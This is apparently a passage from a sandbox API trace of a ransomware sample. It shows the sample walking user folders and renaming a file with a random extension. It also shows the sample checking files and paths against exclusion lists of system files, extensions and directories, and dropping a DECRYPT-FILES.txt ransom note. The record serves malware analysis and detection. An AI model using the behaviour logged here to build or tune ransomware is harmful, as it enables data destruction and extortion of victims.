lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.046] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.046] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.046] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.046] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.046] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.046] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.046] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.046] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.047] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.047] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.047] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.047] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.047] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.047] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.047] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.047] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.047] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.047] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.047] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.047] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.047] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.047] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.047] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.048] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.048] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT") returned 85 [0078.048] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.JG6Rv") returned 91 [0078.048] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.JG6Rv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt.jg6rv"), dwFlags=0x0) returned 1 [0078.048] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.049] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.049] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.049] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab0a560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.049] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.049] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.049] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.049] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.049] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.049] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.049] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.049] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.049] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.049] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.049] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.049] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.049] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.049] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.049] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.050] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned 75 [0078.050] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.050] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\" [0078.050] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\jkbimi8.tmp" [0078.050] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.050] CloseHandle (hObject=0x0) returned 0 [0078.050] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.050] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab0a560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.050] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0078.050] CloseHandle (hObject=0x458) returned 1 [0078.051] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab0a560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.051] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.051] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab0a560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.051] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.051] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.051] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.051] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.051] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.051] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.051] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.051] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.051] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.051] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.051] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.051] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.051] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.051] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.051] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.051] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned 70 [0078.051] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.051] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\" [0078.051] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\jkbimi8.tmp" [0078.051] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.052] CloseHandle (hObject=0x0) returned 0 [0078.052] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.052] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab0a560, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab0a560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab0a560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.052] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0078.052] CloseHandle (hObject=0x450) returned 1 [0078.052] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaae4400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.052] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.052] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaae4400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.052] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.052] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.052] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.052] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.052] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.052] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.052] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.052] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.052] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.052] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.052] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.053] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.053] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.053] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.053] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.053] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned 67 [0078.053] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.053] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\" [0078.053] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\jkbimi8.tmp" [0078.053] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.053] CloseHandle (hObject=0x0) returned 0 [0078.053] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.053] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaae4400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.053] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.054] CloseHandle (hObject=0x448) returned 1 [0078.054] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0078.054] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0078.054] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0078.054] lstrcatW (in: lpString1="Network", lpString2="\\" | out: lpString1="Network\\") returned="Network\\" [0078.054] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Network\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\" [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\Program Files") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch=":\\Windows") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\Games\\") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\All Users") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="AhnLab") returned 0x0 [0078.054] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.054] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned 64 [0078.054] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.054] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\\\jkbimi8.tmp") returned 76 [0078.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.055] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned 64 [0078.055] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.055] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\\\DECRYPT-FILES.txt") returned 82 [0078.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.055] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.056] CloseHandle (hObject=0x44c) returned 1 [0078.057] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\") returned 64 [0078.057] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*" [0078.057] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, 